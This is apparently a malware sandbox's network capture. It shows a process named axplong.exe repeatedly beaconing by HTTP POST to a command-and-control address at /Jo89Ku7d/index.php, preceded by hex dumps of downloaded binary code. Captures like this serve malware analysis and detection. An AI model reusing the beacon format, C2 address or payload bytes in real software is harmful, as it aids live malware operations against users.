Aug 19, 2024 06:04:03.522368908 CEST	328	IN	Data Raw: 50 6a 40 89 45 d4 ff d6 8b f8 85 ff 74 7b 6a 00 e8 3e 04 00 00 ff 75 d4 57 e8 03 04 00 00 ff 75 e4 6a 40 ff d6 8b f0 89 75 c4 85 f6 74 32 ff 75 e4 56 6a 00 ff 75 e0 e8 2e 04 00 00 eb 14 8b 1e 8b 46 04 53 83 c6 08 56 03 c7 50 e8 ed 2d 00 00 03 f3 Data Ascii: Pj@Et{j>uWuj@ut2uVju.FSVP->uu,@3VEPuWuP@W,@VVuju@j^}j^ul@EV}3;=GEi @5G\|uVSQ9
Aug 19, 2024 06:04:03.522567034 CEST	1236	IN	Data Raw: ff 33 f6 39 75 e8 74 1f 39 75 e4 74 0f 50 e8 ce e6 ff ff 56 56 e8 19 e6 ff ff eb 77 56 e8 0a e7 ff ff e9 ba fd ff ff 39 75 e4 74 12 8b 4d e0 8b 15 bc b2 47 00 89 8c 82 94 00 00 00 eb 55 8b 0d bc b2 47 00 ff b4 81 94 00 00 00 53 e8 b4 34 00 00 eb Data Ascii: 39ut9utPVVwV9utMGUGS4@Ej#Qjux@}t$jjut@3FP0PW-EhG3_^[c,@@@%@9@F@a@@@-@@o@@@@"@@@@
Aug 19, 2024 06:04:03.522583008 CEST	1236	IN	Data Raw: 8f 02 ff ff ff eb 2c 6a fc e9 99 fe ff ff 6a fe e9 92 fe ff ff 3b df 74 62 39 75 14 7d 03 8b 75 14 56 53 e8 dd fd ff ff 85 c0 0f 84 75 fe ff ff 89 75 fc 8b 45 fc 5f 5e 5b c9 c2 10 00 8b 75 f8 39 75 14 7d 03 8b 75 14 56 bb 70 e1 41 00 53 e8 b1 fd Data Ascii: ,jj;tb9u}uVSuuE_^[u9u}uVpASIWEPVSuP@t;uuu)u9}U(SV3W]]@h NVSG@jhV'}=@u@VMV7)V.PhN

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:05.578625917 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 31 35 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000156001&unit=246122658369
Aug 19, 2024 06:04:06.173964977 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:06.294747114 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:07.043138981 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:07.046747923 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:07.295567989 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49740	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:07.404413939 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:08.199399948 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:08.372549057 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:08.623753071 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49741	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:08.732296944 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:09.515661955 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:09.516375065 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:09.767544031 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49742	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:09.888324022 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:10.643552065 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:10.648334026 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:10.928026915 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49743	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:11.045289040 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:11.790396929 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:11.791265965 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:12.038708925 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49744	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:12.155153036 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:12.911755085 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:12.915214062 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:13.165496111 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49745	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:13.279222965 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:14.035438061 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:14.036417961 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:14.285152912 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49746	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:14.408303022 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:15.193958044 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:15.443603992 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:15.695039034 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49747	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:15.810082912 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:16.568376064 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:16.581504107 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:16.833468914 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49748	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:16.950937033 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:17.706738949 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:17.921116114 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:18.169989109 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49749	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:18.323564053 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:19.073502064 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:19.074239969 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:19.321466923 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49750	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:19.454060078 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:20.222008944 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
